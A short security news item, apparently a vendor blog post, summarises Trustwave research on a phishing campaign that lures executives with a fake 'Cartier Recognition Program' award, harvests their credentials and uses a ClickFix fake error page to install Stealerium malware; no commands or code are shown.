A phishing campaign is targeting executives with phony offers for awards, according to researchers at Trustwave SpiderLabs. The attackers first dupe the victims into handing over their credentials, then use the ClickFix social engineering technique to trick them into installing malware.
“The campaign uses a high-value executive recognition lure, ‘Cartier Recognition Program,’ to target executives,” the researchers write. “It includes a password-protected ZIP and personalized details to appear legitimate, urging the victim to open the attached ‘secure digital package’ to claim the reward, setting up the credential phish and malware chain that follows.”
If the user opens the ZIP file, they’ll first be taken to an HTML page posing as a login portal, which is designed to harvest their credentials. The login portal is tailored to impersonate the victim’s email provider. After the credentials are sent to the attackers, the victim is shown a phony error page, which initiates the ClickFix stage of the attack.
ClickFix is a social engineering technique that tricks users into copying and pasting a malicious command and running it on their computer. In this case, the fake error page tells users to open a Windows command prompt and paste in a command that will download the Stealerium malware.
“The malicious SVG shows a fake Chrome ‘Aw, snap!’ error and instructs the user to run a PowerShell ‘fix’ in cmd,” the researchers write. “This ClickFix trick turns a simple image download into user-driven code execution, launching the stager that installs Stealerium.”
AI-powered security awareness training can give your organization an essential layer of defense against phishing and other social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
GB Hackers has the story.
